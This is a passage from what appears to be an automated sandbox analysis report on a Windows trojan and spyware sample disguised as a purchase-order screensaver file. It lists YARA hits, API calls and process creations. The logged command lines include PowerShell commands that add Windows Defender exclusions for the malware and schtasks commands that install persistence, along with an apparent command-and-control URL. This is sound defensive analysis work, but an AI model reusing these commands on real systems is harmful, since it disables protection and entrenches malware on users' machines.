                Source: mrNbohrgjTw.exe, 00000014.00000002.873893935.0000000003428000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.mrpokrovskii.pro/7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH
                Source: mrNbohrgjTw.exe, 00000014.00000002.873893935.00000000040B8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.strato.de

                E-Banking Fraud

                Source: Yara match File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000C.00000002.873456007.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.396612978.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000017.00000002.461322824.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.873508536.0000000000360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.873699119.0000000001D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.398641756.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000014.00000002.873703699.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample Static PE information: Filename: RFQ_P.O.1212024.scr
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\SysWOW64\msinfo32.exe Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0042CA13 NtClose,8_2_0042CA13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_009607AC NtCreateMutant,LdrInitializeThunk,8_2_009607AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095F9F0 NtClose,LdrInitializeThunk,8_2_0095F9F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_0095FAE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_0095FB68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_0095FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_009600C4 NtCreateFile,8_2_009600C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00960048 NtProtectVirtualMemory,8_2_00960048
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00960078 NtResumeThread,8_2_00960078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00960060 NtQuerySection,8_2_00960060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_009601D4 NtSetValueKey,8_2_009601D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0096010C NtOpenDirectoryObject,8_2_0096010C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00960C40 NtGetContextThread,8_2_00960C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_009610D0 NtOpenProcessToken,8_2_009610D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00961148 NtOpenThread,8_2_00961148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095F8CC NtWaitForSingleObject,8_2_0095F8CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095F900 NtReadFile,8_2_0095F900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00961930 NtSetContextThread,8_2_00961930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095F938 NtWriteFile,8_2_0095F938
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FAB8 NtQueryValueKey,8_2_0095FAB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FAD0 NtAllocateVirtualMemory,8_2_0095FAD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FA20 NtQueryInformationFile,8_2_0095FA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FA50 NtEnumerateValueKey,8_2_0095FA50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FBB8 NtQueryInformationToken,8_2_0095FBB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FBE8 NtQueryVirtualMemory,8_2_0095FBE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FB50 NtCreateKey,8_2_0095FB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FC90 NtUnmapViewOfSection,8_2_0095FC90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FC30 NtOpenProcess,8_2_0095FC30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FC48 NtSetInformationFile,8_2_0095FC48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FC60 NtMapViewOfSection,8_2_0095FC60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00961D80 NtSuspendThread,8_2_00961D80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FD8C NtDelayExecution,8_2_0095FD8C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FD5C NtEnumerateKey,8_2_0095FD5C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FEA0 NtReadVirtualMemory,8_2_0095FEA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FED0 NtAdjustPrivilegesToken,8_2_0095FED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FE24 NtWriteVirtualMemory,8_2_0095FE24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FFB4 NtCreateSection,8_2_0095FFB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FFFC NtCreateProcessEx,8_2_0095FFFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0095FF34 NtQueueApcThread,8_2_0095FF34
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll A5EF3A78EB333B0E6DCA194EA711DCBB036119A788ECFE125F05176FB0FB70A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 009B3F92 appears 132 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 009B373B appears 253 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0096DF5C appears 137 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0096E2A8 appears 60 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 009DF970 appears 84 times
                Source: RFQ_P.O.1212024.scr Static PE information: invalid certificate
                Source: sqlite3.dll.12.dr Static PE information: Number of sections : 18 > 10
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.374921549.0000000003904000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.370413221.000000000050F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesctasks.exej% vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.371027207.0000000000870000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr, 00000000.00000000.346541696.00000000014A4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesHIO.exe. vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.375920774.00000000053F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.370413221.00000000004E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr Binary or memory string: OriginalFilenamesHIO.exe. vs RFQ_P.O.1212024.scr
                Source: C:\Windows\SysWOW64\msinfo32.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
                Source: RFQ_P.O.1212024.scr Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: RFQ_P.O.1212024.scr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PEJmengI.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, bhfevcinMYctH7vReL.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ElmNrXtZw4MREHe3PO.cs Security API names: _0020.SetAccessControl
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ElmNrXtZw4MREHe3PO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ElmNrXtZw4MREHe3PO.cs Security API names: _0020.AddAccessRule
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ElmNrXtZw4MREHe3PO.cs Security API names: _0020.SetAccessControl
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ElmNrXtZw4MREHe3PO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ElmNrXtZw4MREHe3PO.cs Security API names: _0020.AddAccessRule
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, bhfevcinMYctH7vReL.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ElmNrXtZw4MREHe3PO.cs Security API names: _0020.SetAccessControl
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ElmNrXtZw4MREHe3PO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ElmNrXtZw4MREHe3PO.cs Security API names: _0020.AddAccessRule
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, bhfevcinMYctH7vReL.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.evad.winSCR@24/18@25/15
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Mutant created: \Sessions\1\BaseNamedObjects\DWhQxlVSHEWFwnynnXdbqrvj
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr File created: C:\Users\user\AppData\Local\Temp\tmp61C0.tmp
                Source: RFQ_P.O.1212024.scr Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\SysWOW64\msinfo32.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: RFQ_P.O.1212024.scr Virustotal: Detection: 38%
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr File read: C:\Users\user\Desktop\RFQ_P.O.1212024.scr
                Source: unknown Process created: C:\Users\user\Desktop\RFQ_P.O.1212024.scr "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {5B36C18D-91BD-4673-848D-E2536B74881F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\PEJmengI.exe C:\Users\user\AppData\Roaming\PEJmengI.exe
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\msinfo32.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: odbc32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mozglue.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wdscore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptui.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: riched32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: version.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: winnsi.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: dhcpcsvc.dll
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: rasadhlp.dll
